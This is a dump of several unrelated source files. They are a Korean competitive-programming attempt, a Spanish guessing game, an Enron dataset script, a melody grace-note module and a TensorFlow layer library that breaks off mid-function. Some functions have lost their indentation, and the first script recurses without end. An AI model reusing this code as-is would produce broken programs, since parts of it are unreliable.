5,127 | dc5d56d65417dd8061a018a2f07132b03e2d616e | # 15650번 수열 2번째
# Baekjoon problem 15650 (combinations) - work in progress.
# NOTE(review): the original indentation was lost in this dump; the nesting
# below is a best-effort reconstruction - verify against the source repo.
n, m = list(map(int, input().split()))
arr = [i for i in range(1,n+1)]   # candidate numbers 1..n
check = []                        # current partial selection

def seq(ctn, array, l):
    """Recursive enumeration attempt (incomplete).

    NOTE(review): the ctn == m base case is commented out and `array` is
    never appended to, so `sorted(check) in array` is always False and the
    recursion has no terminating condition - this will recurse until
    RecursionError as written.
    """
    if sorted(check) in array:
        return
    # if ctn == m:
    #     # l+=1
    #     # print('ctn :',ctn,' check :',sorted(check))
    #     array.append(sorted(check))
    #     for k in range(m):
    #         print(check[k], end = ' ')
    #     print()
    #     return
    for i in range(n):
        l += 1
        check.append(arr[i])
        seq(ctn+1, array, l)
        check.pop()
    # debug trace - presumably meant to run after the loop; confirm placement
    print('l :',l,' i :',i)

seq(0,[], 1)
5,128 | 8498ba69e4cc5c5f480644ac20d878fb2a632bee | '''
Confeccionar un programa que genere un número aleatorio entre 1 y 100 y no se muestre.
El operador debe tratar de adivinar el número ingresado.
Cada vez que ingrese un número mostrar un mensaje "Gano" si es igual al generado o "El número aleatorio el mayor" o "El número aleatorio es menor".
Mostrar cuando gana el jugador cuantos intentos necesitó.
'''
import random
def generar_numero_aleatorio():
    """Return a pseudo-random integer in the inclusive range [1, 100]."""
    # randrange(1, 101) is exactly what randint(1, 100) does internally.
    return random.randrange(1, 101)
def es_el_numero(resp_usuario, resp_correc):
    """Return True when the user's guess equals the secret number."""
    coinciden = (resp_usuario == resp_correc)
    return coinciden
def numero_dado_es_mayor(resp_usuario, resp_correc):
    """Return True when the user's guess is strictly greater than the secret."""
    es_mayor = resp_usuario > resp_correc
    return es_mayor
def juego_terminado(numero_correcto, numero_intentos):
    """Announce the end of the game with the secret number and attempt count."""
    print("El juego ha terminado!")
    # Joining with single spaces produces exactly the same output as
    # print(..., sep=" ") did in the original.
    partes = ["El numero correcto era", str(numero_correcto),
              "y lo resolviste en", str(numero_intentos), "intentos."]
    print(" ".join(partes))
def el_numero_es_mayor():
    """Tell the player their guess was higher than the secret number."""
    mensaje = "El numero que diste es mayor al correcto, intenta de nuevo!"
    print(mensaje)
def el_numero_es_menor():
    """Tell the player their guess was lower than the secret number."""
    mensaje = "El numero que diste es menor al correcto, intenta de nuevo!"
    print(mensaje)
def iniciar_juego():
    """Run the guessing loop: keep prompting until the player finds the number.

    Picks a secret in [1, 100], then reads guesses from stdin, printing a
    higher/lower hint after each miss and the attempt count on success.
    """
    gano = False
    intentos = 1          # counts the winning attempt too (starts at 1)
    numero = 0
    respuesta_correc = generar_numero_aleatorio()
    while (not gano):
        numero = int(input("Ingresa un numero: "))
        if (es_el_numero(numero,respuesta_correc)):
            juego_terminado(respuesta_correc,intentos)
            gano = True
        else:
            if (numero_dado_es_mayor(numero,respuesta_correc)):
                el_numero_es_mayor()
            else:
                el_numero_es_menor()
            # only misses increment the counter before the next prompt
            intentos += 1

iniciar_juego()
|
5,129 | c5d224a3d63d0d67bc7a48fecec156cca41cdcf7 | #!/usr/bin/python
"""
Starter code for exploring the Enron dataset (emails + finances);
loads up the dataset (pickled dict of dicts).
The dataset has the form:
enron_data["LASTNAME FIRSTNAME MIDDLEINITIAL"] = { features_dict }
{features_dict} is a dictionary of features associated with that person.
You should explore features_dict as part of the mini-project,
but here's an example to get you started:
enron_data["SKILLING JEFFREY K"]["bonus"] = 5600000
"""
import pickle
import math
# NOTE(review): Python 2 idiom - the file handle is never closed explicitly
# (relies on GC), and text mode "r" for a pickle only works on Python 2.
enron_data = pickle.load(open("../final_project/final_project_dataset.pkl", "r"))
def print_it():
    """Dump every person in enron_data along with each feature/value pair."""
    for person, features in enron_data.items():
        print (person)
        for feature in features:
            print (feature, ':', features[feature])
#print_it()
# Python 2 script body: answers the Udacity "Datasets and Questions"
# mini-project questions against the loaded enron_data dict.

print "persons:", len(enron_data)
print "features:", len(enron_data["SKILLING JEFFREY K"])

# Count persons of interest
pois = 0
for n in enron_data:
    if enron_data[n]["poi"] == 1:
        pois = pois + 1
print "nbr of poi:", pois

print "stock value James Prentice:", enron_data["PRENTICE JAMES"]["total_stock_value"]
print "Wesley Colwell sent mail to pois:", enron_data["COLWELL WESLEY"]["from_this_person_to_poi"], "times"
print "Jeffrey K Skilling exercised stock:", enron_data["SKILLING JEFFREY K"]["exercised_stock_options"]
print "money for Lay:", enron_data["LAY KENNETH L"]["total_payments"], ", Skilling:", enron_data["SKILLING JEFFREY K"]["total_payments"], " & Fastow:", enron_data["FASTOW ANDREW S"]["total_payments"]

# Count how many have a known salary / email address (features use the
# string "NaN" for missing values, not float NaN)
salary = 0
email = 0
for n in enron_data:
    if not enron_data[n]["salary"] == "NaN":
        salary = salary + 1
    if not enron_data[n]["email_address"] == "NaN":
        email = email + 1
print "nbr of salary:", salary, ", email: ", email

# Fraction with missing total_payments (Python 2 integer division)
total_pay = 0
for n in enron_data:
    if enron_data[n]["total_payments"] == "NaN":
        total_pay = total_pay + 1
print "% not salary:", (total_pay * 100 / len(enron_data)), ", ", total_pay

# Same, restricted to POIs
total_pay_pois = 0
for n in enron_data:
    if enron_data[n]["poi"] == 1:
        if enron_data[n]["total_payments"] == "NaN":
            total_pay_pois = total_pay_pois + 1
print "% not salary & poi:", (total_pay_pois * 100 / pois)
5,130 | ac83d7d39319c08c35302abfb312ebee463b75b2 | import sys
from melody_types import *
import dataclasses
"""
Marks notes for grace notes
"""
# Mark grace notes on the peak note of every segment
def _peaks(song):
    """Mark the peak note of every up-down segment as a grace note.

    For each segment whose direction is UPDOWN, flags the note immediately
    before the first pitch drop (i.e. the peak) with ``grace = True``.
    Segments of other directions are left untouched.

    :param song: a Song whose phrases contain PhraseElements/Segments
    """
    for phrase in song.phrases:
        for pe in phrase.phrase_elements:
            if type(pe) == Segment:
                if pe.direction != SegmentDirection.UPDOWN:
                    continue
                # Find the first pitch drop; the preceding note is the peak.
                # (Leftover debug print to stderr removed.)
                for i in range(1, len(pe.notes)):
                    if pe.notes[i].pitch < pe.notes[i - 1].pitch:
                        pe.notes[i - 1].grace = True
                        break
# Adds a grace note to consonant notes in every segment
def _consonant(song):
    """Add a grace note to consonant notes in every segment.

    Not implemented yet - intentional stub.
    """
    pass
def _insert_grace_notes(song):
    """Materialize marked grace notes by inserting a short note before them.

    For at most one grace-marked note per segment (the `flag` guard), a new
    quarter-beat note one scale step above is inserted before it, and the
    original note is shortened by the same 1/4 duration so the segment's
    total length is preserved. All notes are copied so segments end up with
    fresh Note instances.
    """
    for phrase in song.phrases:
        for pe in phrase.phrase_elements:
            if type(pe) != Segment:
                continue
            segment = pe
            initial_len = len(segment.notes)
            new_notes = []
            flag = False   # ensures only the first grace-marked note is expanded
            for i in range(len(pe.notes)):
                if segment.notes[i].grace and not flag:
                    # Grace note: one scale degree above, 1/4 duration,
                    # flagged `new=True` so later passes can identify it.
                    new_note = Note(pitch=phrase.scale.skip_up(segment.notes[i].pitch, 1), new=True, duration=1/4)
                    new_notes += [new_note]
                    segment.notes[i].duration -= 1/4
                    flag = True
                # Copy every original note (dataclasses.replace clones it)
                new_notes += [dataclasses.replace(segment.notes[i])]
            # At most one note was inserted per segment
            assert(len(new_notes) - initial_len <= 1)
            pe.notes = list(new_notes)
def add_grace_notes(song):
    """Mark segment peaks as grace notes, then insert the actual grace notes.

    Order matters: _insert_grace_notes consumes the `grace` flags that
    _peaks sets.
    """
    _peaks(song)
    _insert_grace_notes(song)
|
5,131 | 940c3b4a2b96907644c0f12deddd8aba4086a0f0 | # -*- coding: utf-8 -*-
from tensorflow.python.ops.image_ops_impl import ResizeMethod
import sflow.core as tf
from sflow.core import layer
import numpy as np
# region arg helper
def _kernel_shape(nd, k, indim, outdim):
if isinstance(k, int):
k = [k for _ in range(nd)]
k = list(k)
assert len(k) == nd
k.extend([indim, outdim])
return k
def _stride_shape(nd, s):
"""
:param nd:
:param s: int | list | tuple
:return:
"""
if isinstance(s, int):
s = [s for _ in range(nd)]
s = list(s)
assert len(s) == nd
s = [1] + s + [1]
return s
# endregion
# region conv
# @layer
# @patchmethod(tf.Tensor, tf.Variable)
@layer
def conv(x, outdim, kernel=3, stride=1, pad=0, padding='SAME', mode='CONSTANT',
         initializer=tf.he_uniform, bias=False, **kwargs):
    """Rank-dispatching convolution: picks conv1d/conv2d/conv3d from x.ndim.

    :param x: input tensor; rank 3 -> conv1d, rank 4 -> conv2d, rank 5 -> conv3d
    :raises ValueError: for any other rank
    """
    nd = x.ndim
    if nd == 3:
        return conv1d(x, outdim, kernel, stride=stride, pad=pad, padding=padding, mode=mode,
                      initializer=initializer, bias=bias, **kwargs)
    elif nd == 4:
        return conv2d(x, outdim, kernel, stride=stride, pad=pad, padding=padding, mode=mode,
                      initializer=initializer, bias=bias, **kwargs)
    elif nd == 5:
        return conv3d(x, outdim, kernel, stride=stride, pad=pad, padding=padding, mode=mode,
                      initializer=initializer, bias=bias, **kwargs)
    else:
        raise ValueError('conv for {nd}? nd <= 5'.format(nd=nd))
@layer
def conv1d(x, outdim, kernel, stride=1, pad=0, padding='SAME', mode='CONSTANT',
           initializer=tf.he_uniform, bias=False, **kwargs):
    """1-D convolution with optional manual (non-constant-mode) padding.

    When padding='SAME' but mode is not 'CONSTANT' (e.g. 'REFLECT'),
    the SAME padding is applied manually via tf.pad so the requested pad
    mode can be honored, and the conv itself runs with 'VALID'.
    """
    kernel = _kernel_shape(1, kernel, x.dims[-1], outdim)

    pads = None
    if padding == 'SAME' and mode != 'CONSTANT':
        # pad manually: split kernel-1 asymmetrically like SAME would
        half = (kernel[0] - 1) // 2
        pads = [(0, 0), (pad + half, pad + kernel[0] - 1 - half), (0, 0)]
        padding = 'VALID'  # change to valid because manually padded
    elif pad:
        # extra symmetric padding on the spatial axis only
        pads = [(0, 0), (pad, pad), (0, 0)]
    if pads is not None:
        x = tf.pad(x, pads, mode=mode)

    W = tf.get_weight('W', shape=kernel, initializer=initializer(kernel), **kwargs)
    out = tf.nn.conv1d(x, W, stride, padding)
    if bias:
        b = tf.get_bias('b', shape=(outdim,), initializer=tf.zeros_initializer(), **kwargs)
        out = tf.nn.bias_add(out, b)
    return out
@layer
def conv2d(x, outdim, kernel, stride=1, pad=0, padding='SAME', mode='CONSTANT',
           initializer=tf.he_uniform, bias=False, **kwargs):
    """2-D convolution (NHWC) with optional manual (non-constant-mode) padding.

    Mirrors conv1d: for SAME padding with a non-CONSTANT pad mode, the pad
    amounts are computed per spatial axis and applied via tf.pad, and the
    conv runs with 'VALID'.
    """
    kernel = _kernel_shape(2, kernel, x.dims[-1], outdim)
    stride = _stride_shape(2, stride)

    pads = None
    if padding == 'SAME' and mode != 'CONSTANT':
        # pad manually: SAME-equivalent asymmetric split per axis
        half = ((kernel[0] - 1) // 2, (kernel[1] - 1) // 2)
        pads = [(0, 0),
                (pad + half[0], pad + kernel[0] - 1 - half[0]),
                (pad + half[1], pad + kernel[1] - 1 - half[1]), (0, 0)]
        padding = 'VALID'  # change to valid because manually padded
    elif pad:
        pads = [(0, 0), (pad, pad), (pad, pad), (0, 0)]
    if pads is not None:
        x = tf.pad(x, pads, mode=mode)

    W = tf.get_weight('W', shape=kernel, initializer=initializer(kernel), **kwargs)
    out = tf.nn.conv2d(x, W, stride, padding)
    if bias:
        b = tf.get_bias('b', shape=(outdim,), initializer=tf.zeros_initializer(), **kwargs)
        out = tf.nn.bias_add(out, b)
    return out
@layer
def conv3d(x, outdim, kernel, stride=1, pad=0, padding='SAME', mode='CONSTANT',
           initializer=tf.he_uniform, bias=False, **kwargs):
    """3-D convolution (NDHWC) with optional manual (non-constant-mode) padding."""
    kernel = _kernel_shape(3, kernel, x.dims[-1], outdim)
    stride = _stride_shape(3, stride)  # stride 5-dim

    pads = None
    if padding == 'SAME' and mode != 'CONSTANT':
        # pad manually: SAME-equivalent asymmetric split per spatial axis
        half = ((kernel[0] - 1) // 2, (kernel[1] - 1) // 2, (kernel[2] - 1) // 2)
        pads = [(0, 0),
                (pad + half[0], pad + kernel[0] - 1 - half[0]),
                (pad + half[1], pad + kernel[1] - 1 - half[1]),
                (pad + half[2], pad + kernel[2] - 1 - half[2]), (0, 0)]
        padding = 'VALID'  # change to valid because manually padded
    elif pad:
        pads = [(0, 0), (pad, pad), (pad, pad), (pad, pad), (0, 0)]
    if pads is not None:
        x = tf.pad(x, pads, mode=mode)

    W = tf.get_weight('W', shape=kernel, initializer=initializer(kernel), **kwargs)
    out = tf.nn.conv3d(x, W, stride, padding)
    if bias:
        b = tf.get_bias('b', shape=(outdim,), initializer=tf.zeros_initializer(), **kwargs)
        out = tf.nn.bias_add(out, b)
    return out
# endregion
# region normalization
@layer
def bn(x, stddev=0.002, beta=0.0, gamma=1.0, epsilon=1e-5, momentum=0.99, axis=-1, training=None, **kwargs):
    """Batch normalization wrapping tf.layers.batch_normalization.

    gamma is initialized from N(gamma, stddev); beta from a constant.
    `scale`/`center` may be passed via kwargs to disable either parameter.
    When `training` is not given, it defaults to False under variable reuse
    (inference against existing moving stats), otherwise to the graph's
    is_training flag.
    """
    if kwargs.pop('scale', True):
        init_gamma = tf.random_normal_initializer(mean=gamma, stddev=stddev)
    else:
        init_gamma = None
    if kwargs.pop('center', True):
        init_beta = tf.constant_initializer(beta)
    else:
        init_beta = None

    reuse = tf.get_variable_scope().reuse
    if training is None and (reuse or kwargs.get('reuse', False)):
        # reused scope implies inference: use the stored moving statistics
        training = False
    elif training is None:
        training = x.graph.is_training
    # reuse = reuse is None or reuse is True

    out = tf.layers.batch_normalization(x, axis=axis, momentum=momentum, epsilon=epsilon,
                                        beta_initializer=init_beta,
                                        gamma_initializer=init_gamma,
                                        moving_mean_initializer=tf.zeros_initializer(),
                                        moving_variance_initializer=tf.ones_initializer(),
                                        training=training,
                                        **kwargs
                                        )
    return out
@layer
def renorm(x, axis=-1, momentum=0.99, epsilon=0.001, training=None,
           gamma=1.0, beta=0.0, stddev=0.002,
           renorm_momentum=0.99, renorm_clipping=None,
           **kwargs):
    """Batch renormalization (Ioffe 2017).

    https://arxiv.org/abs/1702.03275
    https://www.tensorflow.org/api_docs/python/tf/layers/batch_normalization

    :param x: input tensor
    :param dict renorm_clipping: A dictionary that may map keys 'rmax', 'rmin', 'dmax' to scalar Tensors
        used to clip the renorm correction. The correction (r, d) is used as corrected_value = normalized_value * r + d,
        with r clipped to [rmin, rmax], and d to [-dmax, dmax].
        Missing rmax, rmin, dmax are set to inf, 0, inf, respectively.
    :return: normalized tensor
    """
    init_gamma = tf.random_normal_initializer(mean=gamma, stddev=stddev)
    init_beta = tf.constant_initializer(beta)

    reuse = tf.get_variable_scope().reuse
    if training is None and (reuse or kwargs.get('reuse', False)):
        # reused scope implies inference mode
        training = False
    elif training is None:
        training = x.graph.is_training

    if renorm_clipping is not None:
        # Convenience: if only rmax was given, default rmin to its reciprocal
        if renorm_clipping.get('rmin', None) is None:
            rmax = renorm_clipping.get('rmax', None)
            if rmax is not None and not np.isinf(rmax):
                rmin = 1 / rmax
                renorm_clipping['rmin'] = rmin

    out = tf.layers.batch_normalization(x, axis=axis, momentum=momentum, epsilon=epsilon,
                                        beta_initializer=init_beta,
                                        gamma_initializer=init_gamma,
                                        training=training,
                                        renorm=True,
                                        renorm_clipping=renorm_clipping,
                                        renorm_momentum=renorm_momentum,
                                        **kwargs
                                        )
    return out
@layer
def inorm(x, beta=0.0, gamma=1.0, stddev=0.002, epsilon=1e-5, axis=None, trainable=True, **kwargs):
    """
    instance normalization over the spatial axes (e.g. W,H for BHWC input);
    output is independent of train/inference mode.
    # https://arxiv.org/pdf/1607.08022.pdf for instance normalization
    # z = gamma * (x-m)/s + beta
    # note gamma, beta
    :param x: [BHWC] is common case
    :param gamma: initial scale (or the scale tensor itself when trainable=False)
    :param beta: initial offset (or the offset tensor itself when trainable=False)
    :param epsilon: variance epsilon
    :return: normalized tensor
    """
    # normalize over all axes except batch (0) and channel (-1)
    axes = list(range(1, 1 + x.ndim-2))  # axes = [1,2] for BWHC except batch, channel
    m, v = tf.nn.moments(x, axes=axes, keep_dims=True)
    shapelast = x.dims[-1:]
    if trainable:
        # learn per-channel gamma/beta
        init_gamma = tf.random_normal_initializer(mean=gamma, stddev=stddev)
        init_beta = tf.constant_initializer(beta)
        gamma_t = tf.get_weight(name='gamma', shape=shapelast, initializer=init_gamma)
        beta_t = tf.get_bias(name='beta', shape=shapelast, initializer=init_beta)
    else:
        # use the provided values directly (e.g. conditioned tensors from cnorm)
        gamma_t = gamma
        beta_t = beta
    # out = (x - m) / tf.sqrt(v + epsilon)
    # out = tf.nn.batch_normalization(x, m, v, beta, gamma, epsilon)
    out = tf.nn.batch_normalization(x, m, v, offset=beta_t, scale=gamma_t, variance_epsilon=epsilon)
    return out
@layer
def cnorm(x, labels, klass=None, stddev=0.01, beta=0.0, gamma=1.0, epsilon=1e-5):
    """
    conditional instance normalization (by label index)
    for learning embedding value of beta and gamma
    # https://arxiv.org/pdf/1610.07629.pdf for conditional instance normalization
    :param x: input tensor
    :param labels: [B,] integer class labels selecting per-class beta/gamma
    :param klass: size of embedding var (total number of classes, required)
    :param gamma: initial_gamma
    :param stddev: stddev for gamma random init
    :param beta: initial beta value
    :param epsilon: 1e-5 for var_epsilon
    :return: normalized tensor
    """
    # total klass count needs !!
    assert klass is not None
    init_gamma = tf.random_normal_initializer(mean=gamma, stddev=stddev)
    init_beta = tf.constant_initializer(beta)

    # params: broadcastable shape [klass, 1, ..., C]
    shape = [1] * x.ndim
    shape[0] = klass
    shape[-1] = x.dims[-1]  # ones but last channel axis
    # [klass, 1, 1, C] for [BHWC] data
    beta_v = tf.get_weight(name='beta', shape=shape, initializer=init_beta)
    gamma_v = tf.get_weight(name='gamma', shape=shape, initializer=init_gamma)

    # conditioned by label: gather the per-class parameters
    beta_l = tf.nn.embedding_lookup(beta_v, labels)
    gamma_l = tf.nn.embedding_lookup(gamma_v, labels)

    # delegate to inorm with the looked-up (non-trainable-here) parameters
    return inorm(x, beta=beta_l, gamma=gamma_l, epsilon=epsilon)
@layer
def lnorm(x, center=True, scale=True, activation_fn=None, reuse=None,
          variables_collections=None, outputs_collections=None,
          trainable=True, begin_norm_axis=1, begin_params_axis=-1,
          scope=None,
          **kwargs):
    """
    Layer normalization: thin wrapper around tf.contrib.layers.layer_norm.

    :param x: input tensor
    :param begin_norm_axis: first axis of the normalization span (default 1
        normalizes over all non-batch axes)
    :param begin_params_axis: first axis of the beta/gamma parameter shape
    :param scope: optional variable scope name for the layer's variables
    :return: normalized tensor
    """
    # BUG FIX: the original passed scope=None unconditionally, silently
    # discarding a caller-supplied scope; forward the parameter instead.
    return tf.contrib.layers.layer_norm(x, center=center, scale=scale,
                                        activation_fn=activation_fn, reuse=reuse,
                                        variables_collections=variables_collections,
                                        outputs_collections=outputs_collections,
                                        trainable=trainable,
                                        begin_norm_axis=begin_norm_axis,
                                        begin_params_axis=begin_params_axis,
                                        scope=scope,
                                        **kwargs)
@layer
def gnorm(x, group):
    """
    group normalization (Wu & He, 2018)
    :param x: [N, ...., C]
    :param int group: G, number of channel groups; must divide C evenly
    :return: tensor of the same shape as x
    """
    # Reference pseudo-code from the paper:
    # def GroupNorm(x, gamma, beta, G, eps=1e−5):
    #     # x: input features with shape [N,C,H,W]
    #     # gamma, beta: scale and offset, with shape [1,C,1,1]
    #     # G: number of groups for GN
    #     N, C, H, W = x.shape
    #     x = tf.reshape(x, [N, G, C // G, H, W])
    #     mean, var = tf.nn.moments(x, [2, 3, 4], keep dims=True)
    #     x = (x − mean) / tf.sqrt(var + eps)
    #     x = tf.reshape(x, [N, C, H, W])
    #     return x ∗ gamma + beta

    # Split channels into `group` groups: [..., C] -> [..., C//G, G]
    shape = list(x.dims)
    if shape[0] is None:
        shape[0] = -1  # dynamic batch size
    ch = shape[-1]
    shape[-1] = ch // group
    shape.append(group)
    # TODO: handle channel counts that are not evenly divisible by group
    assert (ch // group) * group == ch
    x = tf.reshape(x, shape)
    # NOTE(review): lnorm defaults to begin_norm_axis=1, which normalizes
    # over all non-batch axes (including the group axis) - confirm this
    # matches the intended per-group statistics of the paper.
    x_n = lnorm(x)
    # restore original shape [..., C]
    shape = shape[:-1]
    shape[-1] = ch
    x = tf.reshape(x_n, shape)
    return x
# endregion
# region dense and dropout
@layer
def dropout(x, keep_prob=0.5, is_training=None, noise_shape=None, seed=None):
    """Dropout applied only in training mode (identity at inference).

    :param keep_prob: probability of keeping a unit; 1.0 short-circuits to x
    :param is_training: bool/tensor; defaults to the graph's is_training flag
    """
    if keep_prob == 1.0:
        # no-op: avoid building the cond graph
        return x

    def _dropout():
        return tf.nn.dropout(x, keep_prob, noise_shape, seed)

    if is_training is None:
        is_training = x.graph.is_training
    else:
        is_training = tf.convert_to_tensor(is_training)
    # train: dropout branch; eval: pass-through
    return tf.cond(is_training, _dropout, lambda: x)
@layer
def dense(x, outdim, initializer=tf.glorot_uniform, bias=False, name=None):
    """
    Fully connected layer: ``out = x . W (+ b)``.

    4D inputs are flattened to 2D first.  If ``outdim`` is a shape (not an
    int) the result is reshaped to ``[-1] + list(outdim)`` after the matmul.

    :param x: tensor, 2D [batch, features] or 4D (flattened internally)
    :param outdim: output size (int) or output shape (sequence)
    :param initializer: weight initializer factory
    :param bias: add a bias term when True
    :param name: optional name for the output tensor
    :return: output tensor
    """
    if x.ndim == 4:
        x = x.flat2d()
    assert x.ndim == 2
    # a non-int outdim means "reshape the output to this shape"
    outshape = not isinstance(outdim, int)
    if outshape:
        dim = [-1] + list(outdim)
        outdim = np.prod(outdim)
    shape = [x.dims[-1], outdim]
    W = tf.get_weight('W', shape=shape, initializer=initializer(shape))
    # W = tf.get_weight('W', initializer=initializer(shape))
    out = x.dot(W)
    if bias:
        b = tf.get_bias('b', shape=(outdim,), initializer=tf.zeros_initializer())
        out = tf.nn.bias_add(out, b)
    if outshape:
        # make reshape
        out = out.reshape(dim)
    return tf.identity(out, name=name)
# endregion
@layer
def bias(x, initializer=tf.zeros_initializer, name=None):
    """Add a learnable per-channel bias along the last axis of ``x``."""
    outdim = x.dims[-1]
    b = tf.get_bias('b', shape=(outdim,), initializer=initializer())
    return tf.nn.bias_add(x, b, name=name)
# region pooling
def _pool_kernel_stide(dim, kernel, stride):
if isinstance(kernel, int):
kernel = [kernel] * dim
if isinstance(stride, int):
stride = [stride] * dim
assert len(kernel) == dim and len(stride) == dim
return [1] + list(kernel) + [1], [1] + list(stride) + [1]
@layer
def maxpool(x, kernel=2, stride=None, padding='SAME'):
    """
    Max pooling for 4D (2 spatial dims) or 5D (3 spatial dims) input.

    :param x: input tensor, channels-last
    :param kernel: pooling window per spatial axis (int or sequence)
    :param stride: step per spatial axis; defaults to ``kernel``
    :param padding: 'SAME' or 'VALID'
    """
    nd = x.ndim - 2
    stride = kernel if stride is None else stride
    kernel, stride = _pool_kernel_stide(nd, kernel, stride)
    if nd == 2:
        return tf.nn.max_pool(x, kernel, stride, padding)
    elif nd == 3:
        return tf.nn.max_pool3d(x, kernel, stride, padding)
    else:
        raise ValueError('maxpool support {0}? '.format(nd))
@layer
def maxpool_where(x, kernel, stride=None, pads=None, padding='SAME', keep=None):
    """
    Max pooling that also produces the argmax mask (for later unpooling).

    :param x: input tensor
    :param kernel: pooling window; also used as the stride
    :param stride: must be None (kernel == stride is assumed)
    :param pads: optional padding forwarded to ``where_pooled``
    :param padding: must be 'SAME'
    :param keep: optional list; when given, the mask is appended to it and
        only the pooled tensor is returned
    :return: (pooled, mask), or just pooled when ``keep`` is supplied
    """
    # assume kernel == stride
    assert stride is None and padding == 'SAME'
    stride = kernel
    pooled = maxpool(x, kernel, stride=stride, padding=padding)
    mask = where_pooled(x, pooled, kernel, pads=pads)
    if keep is None:
        return pooled, mask
    else:
        keep.append(mask)
        return pooled
@layer
def where_pooled(x, pooled, kernel=None, pads=None):
    """
    Build a float mask marking which elements of ``x`` survived max pooling.

    The pooled values are tiled back up to the input resolution and compared
    element-wise with ``x``; positions equal to the pooled maximum get 1.0.

    :param x: pre-pooling tensor; 4D only
    :param pooled: pooled tensor
    :param kernel: pooling window (int or pair); inferred when None
    :param pads: optional spatial padding applied to the tiled tensor
    :return: float mask with the same shape as ``x``
    """
    # todo : add 3d support
    assert x.ndim == 4
    import math
    if kernel is None:
        # NOTE(review): ``pooled.zip`` looks wrong -- presumably this should
        # be ``pooled.dims`` so the per-axis shape ratio is computed; confirm.
        kernel = [math.ceil(float(d) / float(p)) for d, p in zip(x.dims, pooled.zip)]
        repeat = pooled.repeats(kernel, axis=[1, 2])
    elif isinstance(kernel, (tuple, list)):
        repeat = pooled.repeats(kernel, axis=[1, 2])
    else:
        repeat = pooled.repeats([kernel, kernel], axis=[1, 2])
    if pads is not None:
        repeat = repeat.pad(pads, axis=[1, 2])
    # crop the tiled tensor back down to the exact input shape
    dim = x.dims
    sameshaped = repeat[:dim[0], :dim[1], :dim[2], :dim[3]]
    mask = tf.equal(x, sameshaped).to_float()
    return mask
@layer
def unpool_where(x, mask, kernel, padding='SAME'):
    """
    Unpool using a max-pool argmax mask: upsample by repetition, then zero
    out every position that was not the pooled maximum.

    :param x: pooled tensor (4D or 5D)
    :param mask: float mask produced by ``where_pooled``/``maxpool_where``
    :param kernel: upsampling factor per spatial axis (int or tuple)
    :param padding: must be 'SAME'
    :return: unpooled tensor with the mask applied
    """
    # really not a option yet
    # assert stride is None
    assert padding == 'SAME'
    nd = x.ndim
    if nd == 4:
        if isinstance(kernel, int):
            kernel = (kernel, kernel)
        unpooled = x.repeats(kernel, axis=(1, 2))
    elif nd == 5:
        if isinstance(kernel, int):
            kernel = (kernel, kernel, kernel)
        unpooled = x.repeats(kernel, axis=(1, 2, 3))
    else:
        raise ValueError('unsupported nd {0}'.format(nd))
    return unpooled * mask
@layer
def unpool_zero(x, kernel):
    """ upsample by inserting zeros between elements along the spatial axes """
    if not isinstance(kernel, (list, tuple)) and isinstance(kernel, int):
        kernel = [kernel] * (x.ndim - 2)
    out = x
    # NOTE(review): range(1, x.ndim-2) stops one axis short of the last
    # spatial axis for 4D input (only axis 1 is processed) -- verify intended.
    for axis in range(1, x.ndim-2):
        out = out.insert_zero(kernel[axis-1], axis=axis)
    return out
@layer
def unpool_repeat(x, kernel):
    """ upsample by repeating each element along the spatial axes """
    if not isinstance(kernel, (list, tuple)) and isinstance(kernel, int):
        kernel = [kernel] * (x.ndim - 2)
    # NOTE(review): range(1, x.ndim-2) excludes the last spatial axis for 4D
    # input (only axis 1 is repeated) -- verify intended.
    return x.repeats(kernel, axis=list(range(1, x.ndim-2)))
@layer
def avgpool(x, kernel, stride, padding='SAME'):
    """
    Average pooling for 4D or 5D channels-last input (cf. ``maxpool``).

    :param kernel: pooling window per spatial axis (int or sequence)
    :param stride: step per spatial axis (int or sequence)
    """
    nd = x.ndim - 2
    kernel, stride = _pool_kernel_stide(nd, kernel, stride)
    if nd == 2:
        return tf.nn.avg_pool(x, kernel, stride, padding)
    elif nd == 3:
        return tf.nn.avg_pool3d(x, kernel, stride, padding)
    else:
        raise ValueError('avgpool support {0}? '.format(nd))
@layer
def gpool(x, keepdims=True):
    """
    Global average pooling over all spatial axes.

    :param x: input tensor [N, ..., C]
    :param keepdims: keep the reduced axes as size-1 dims when True
    :return: per-channel mean
    """
    # http://arxiv.org/pdf/1312.4400.pdf
    axis = list(range(1, x.ndim-1))
    return x.mean(axis=axis, keepdims=keepdims)
# endregion
# region atrous convolution
# def atrous2d(x, )
def _atrous1d(x, kernel, rate, padding='SAME'):
    """
    1-D atrous (dilated) convolution built from plain conv1d via
    time-to-batch / batch-to-time reshuffling, mirroring the 2-D scheme.

    cf https://www.tensorflow.org/versions/r0.11/api_docs/python/nn.html#atrous_conv2d
    :param x: [batch, time, channel]
    :param kernel: filter tensor; ``kernel.dims[0]`` is the filter width
    :param rate: dilation rate; 1 degenerates to an ordinary conv1d
    :param padding: 'SAME' or 'VALID'
    :return: convolved tensor
    """
    # from ireshape import time_to_batch, batch_to_time
    # atrous_conv1d implementation
    if rate == 1:
        # same to normal conv1d
        out = tf.nn.conv1d(x, kernel, stride=(1, 1, 1), padding=padding)
        return out
    # if 'same'
    if padding == 'SAME':
        filter_width = kernel.dims[0]
        # temporal dimension of the filter and the upsampled filter in which we
        # introduce (rate - 1) zeros between consecutive filter values.
        filter_width_up = filter_width + (filter_width - 1) * (rate - 1)
        pad = filter_width_up - 1
        # When pad is odd, we pad more to right
        pad_left = pad // 2
        pad_right = pad - pad_left
    elif padding == 'VALID':
        pad_left = 0
        pad_right = 0
    else:
        raise ValueError('Invalid padding')
    in_width = x.dims[1] + pad_left + pad_right
    # more padding so that rate divides the width of the input
    pad_right_extra = (rate - in_width % rate) % rate
    pads = [(0, 0), (pad_left, pad_right + pad_right_extra), (0, 0)]
    # interleave time into batch so a stride-1 VALID conv realizes dilation
    out = x.time_to_batch(rate, pads)
    out = tf.nn.conv1d(out, kernel, stride=(1, 1, 1), padding='VALID')
    # if bias is not None:
    #     bias=bias,
    crops = [(0, 0), (0, pad_right_extra), (0, 0)]
    # temporary test this
    out = out.batch_to_time(rate, crops)
    return out
@layer
def atrous(x, outdim, kernel, rate, pad=0, padding='SAME',
           initializer=tf.he_uniform, bias=None, **kwargs):
    """
    Atrous (dilated) convolution for 1 or 2 spatial dimensions.

    :param x: input tensor, [N, W, C] or [N, H, W, C]
    :param outdim: number of output channels
    :param kernel: spatial kernel size
    :param rate: dilation rate
    :param pad: symmetric constant padding applied before convolving
    :param bias: add a bias term when not None
    """
    # todo rate per axis?
    assert isinstance(pad, int)
    nd = x.ndim - 2
    if pad:
